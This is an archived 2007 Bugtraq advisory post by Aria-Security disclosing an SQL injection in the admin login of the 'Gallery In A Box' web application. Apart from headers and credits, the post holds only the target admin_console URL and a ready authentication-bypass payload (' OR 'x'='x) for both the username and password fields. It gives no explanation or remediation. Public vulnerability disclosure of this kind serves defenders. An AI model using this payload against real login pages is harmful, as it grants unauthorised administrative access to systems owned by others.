lists.openwall.net   lists  /  announce  john-users  owl-users  popa3d-users  /  xvendor  oss-security  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4 
Open Source and information security mailing list archives
 
This website is powered by Openwall GNU/*/Linux security-enhanced OS
[<prev] [next>] [month] [year] [list] 
Date: 2 Aug 2007 23:28:23 -0000
From: Advisory@...a-security.net
To: bugtraq@...urityfocus.com
Subject: [Aria-Security.Net] Gallery In A Box Username & Password
 Parameters SQL Injection

__________________________

A R I A - S E C U R I T Y
_________________________

Gallery In A Box Username & Password Parameters SQL Injection
Vendor: http://www.kerberosdev.net/

http://target.com/admin_console/index.asp

Username: anything' OR 'x'='x
Password: anything' OR 'x'='x

Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info
Greetz: AurA

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux